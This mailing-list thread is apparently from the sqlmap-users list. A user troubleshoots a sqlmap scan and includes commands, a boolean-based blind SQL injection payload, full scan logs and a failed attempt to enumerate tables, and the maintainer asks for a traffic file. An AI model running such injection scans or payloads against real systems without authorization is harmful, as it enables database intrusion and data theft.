Please send me privatelly content of traffic file for such run (just append
-t traffic.txt to a problematic run).
Kind regards,
Miroslav Stampar
On Dec 15, 2012 5:10 PM, "Volker Nebelung" <volker.nebel...@rwth-aachen.de>
wrote:
> Hi,
>
> I am using sqlmap to scan a specific GET parameter of a target site. I
> know there is a SQL injection in parameter 2:
>
> python sqlmap.py -u "http://example.net/de/de*/site"; --batch
>
> sqlmap gives me the following result:
>
> > …
> > [16:36:19] [INFO] heuristic test shows that URI parameter '#1*' might be
> injectable (possible DBMS: Microsoft Access)
> > [16:36:19] [INFO] testing for SQL injection on URI parameter '#1*'
> > [16:36:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> > [16:36:29] [INFO] URI parameter '#1*' is 'AND boolean-based blind -
> WHERE or HAVING clause' injectable
> > [16:36:29] [INFO] parsed error message(s) showed that the back-end DBMS
> could be Microsoft Access. Do you want to skip test payloads specific for
> other DBMSes? [Y/n] Y
> > [16:36:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
> > [16:36:29] [INFO] automatically extending ranges for UNION query
> injection technique tests as there is at least one other potential
> injection technique found
> > [16:37:05] [INFO] checking if the injection point on URI parameter '#1*'
> is a false positive
> > [16:37:11] [INFO] URI parameter '#1*' is vulnerable. Do you want to keep
> testing the others (if any)? [y/N] N
> > sqlmap identified the following injection points with a total of 34
> HTTP(s) requests:
> > ---
> > Place: URI
> > Parameter: #1*
> > Type: boolean-based blind
> > Title: AND boolean-based blind - WHERE or HAVING clause
> > Payload: http://example.net:80/de/de' AND 9199=9199 AND
> 'tyFW'='tyFW/site
> > ---
> > [16:37:11] [INFO] testing Microsoft Access
> > [16:37:13] [INFO] confirming Microsoft Access
> > [16:37:14] [WARNING] the back-end DBMS is not Microsoft Access
> > [16:37:14] [INFO] testing MySQL
> > [16:37:16] [WARNING] the back-end DBMS is not MySQL
> > [16:37:16] [INFO] testing Oracle
> > [16:37:17] [WARNING] the back-end DBMS is not Oracle
> > [16:37:17] [INFO] testing PostgreSQL
> > [16:37:18] [WARNING] the back-end DBMS is not PostgreSQL
> > [16:37:18] [INFO] testing Microsoft SQL Server
> > [16:37:19] [WARNING] the back-end DBMS is not Microsoft SQL Server
> > [16:37:19] [INFO] testing SQLite
> > [16:37:20] [WARNING] the back-end DBMS is not SQLite
> > [16:37:20] [INFO] testing Firebird
> > [16:37:21] [WARNING] the back-end DBMS is not Firebird
> > [16:37:21] [INFO] testing SAP MaxDB
> > [16:37:22] [WARNING] the back-end DBMS is not SAP MaxDB
> > [16:37:22] [INFO] testing Sybase
> > [16:37:23] [WARNING] the back-end DBMS is not Sybase
> > [16:37:23] [INFO] testing IBM DB2
> > [16:37:24] [WARNING] the back-end DBMS is not IBM DB2
> > [16:37:24] [CRITICAL] sqlmap was not able to fingerprint the back-end
> database management system, but from the HTML error page it was possible to
> determinate that the back-end DBMS is Microsoft Access. Do not specify the
> back-end DBMS manually, sqlmap will fingerprint the DBMS for you
> > [16:37:24] [WARNING] HTTP error codes detected during testing:
> > 400 (Bad Request) - 24 times, 500 (Internal Server Error) - 20 times
> >
> > [*] shutting down at 16:37:24
>
> I am confused at this point: Is sqlmap thinking that the DBMS is MS Access
> or not?
> When I manually try following URL in my browser "
> http://example.net/de/de'/site" I get a 500 HTML-page with output
> "Microsoft JET Database Engine Error …" so I would say the DBMS is MS
> Access.
> When I now try to get for example all tables, then following happens:
>
> > python sqlmap.py -u "example.net/de/de*/site" --batch --tables
> >
> > sqlmap/1.0-dev-0664e72 - automatic SQL injection and database
> takeover tool
> > http://sqlmap.org
> >
> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility to
> obey all applicable local, state and federal laws. Developers assume no
> liability and are not responsible for any misuse or damage caused by this
> program
> >
> > [*] starting at 16:38:02
> >
> > [16:38:05] [INFO] custom injection marking character ('*') found in
> option '-u'. Do you want to process it? [Y/n/q] Y
> > [16:38:05] [INFO] testing connection to the target url
> > sqlmap identified the following injection points with a total of 0
> HTTP(s) requests:
> > ---
> > Place: URI
> > Parameter: #1*
> > Type: boolean-based blind
> > Title: AND boolean-based blind - WHERE or HAVING clause
> > Payload: http://example.net:80/de/de' AND 9199=9199 AND
> 'tyFW'='tyFW/site
> > ---
> > [16:38:07] [INFO] testing MySQL
> > [16:38:08] [INFO] heuristics detected web page charset 'ascii'
> > [16:38:08] [WARNING] the back-end DBMS is not MySQL
> > [16:38:08] [INFO] testing Oracle
> > [16:38:09] [INFO] heuristics detected web page charset 'ISO-8859-2'
> > [16:38:09] [WARNING] the back-end DBMS is not Oracle
> > [16:38:09] [INFO] testing PostgreSQL
> > [16:38:10] [WARNING] reflective value(s) found and filtering out
> > [16:38:10] [WARNING] the back-end DBMS is not PostgreSQL
> > [16:38:10] [INFO] testing Microsoft SQL Server
> > [16:38:11] [WARNING] the back-end DBMS is not Microsoft SQL Server
> > [16:38:11] [INFO] testing SQLite
> > [16:38:12] [WARNING] the back-end DBMS is not SQLite
> > [16:38:12] [INFO] testing Microsoft Access
> > [16:38:12] [INFO] confirming Microsoft Access
> > [16:38:13] [WARNING] the back-end DBMS is not Microsoft Access
> > [16:38:13] [INFO] testing Firebird
> > [16:38:14] [WARNING] the back-end DBMS is not Firebird
> > [16:38:14] [INFO] testing SAP MaxDB
> > [16:38:15] [WARNING] the back-end DBMS is not SAP MaxDB
> > [16:38:15] [INFO] testing Sybase
> > [16:38:16] [WARNING] the back-end DBMS is not Sybase
> > [16:38:16] [INFO] testing IBM DB2
> > [16:38:17] [WARNING] the back-end DBMS is not IBM DB2
> > [16:38:17] [CRITICAL] sqlmap was not able to fingerprint the back-end
> database management system. Support for this DBMS will be implemented at
> some point
> > [16:38:17] [WARNING] HTTP error codes detected during testing:
> > 400 (Bad Request) - 1 times, 500 (Internal Server Error) - 9 times
> >
> > [*] shutting down at 16:38:17
>
> Even when i try to use --text-only or --not-string switches I am not able
> to receive the tables. Any ideas?
>
>
> Best regards
>
> Volker Nebelung
>
> ------------------------------------------------------------------------------
> LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
> Remotely access PCs and mobile devices and provide instant support
> Improve your efficiency, and focus on delivering more value-add services
> Discover what IT Professionals Know. Rescue delivers
> http://p.sf.net/sfu/logmein_12329d2d
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
------------------------------------------------------------------------------
LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
Remotely access PCs and mobile devices and provide instant support
Improve your efficiency, and focus on delivering more value-add services
Discover what IT Professionals Know. Rescue delivers
http://p.sf.net/sfu/logmein_12329d2d
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
